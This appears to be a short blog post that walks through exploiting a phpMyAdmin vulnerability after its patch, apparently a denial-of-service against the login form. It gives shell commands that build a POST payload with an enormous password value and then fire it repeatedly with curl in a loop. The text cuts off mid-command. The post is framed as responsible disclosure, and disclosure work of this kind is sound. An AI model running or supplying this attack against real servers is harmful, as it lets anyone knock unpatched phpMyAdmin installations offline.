Assuming that time enough has happened since the security update was
released by phpMyAdmin, we want to share our researches. As
you already know, we believe in Responsible Disclosure and that is the
reason why we didn't publish this post before.
You can read the vulnerability details in the previous blog post. In this one, we show you the way to exploit it.
1 - Create the payload.
$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s" {1..1000000} >> payload
$ for i in `seq 1 150`; do (curl --data @payload http://your-webserver-
0 comments:
Post a Comment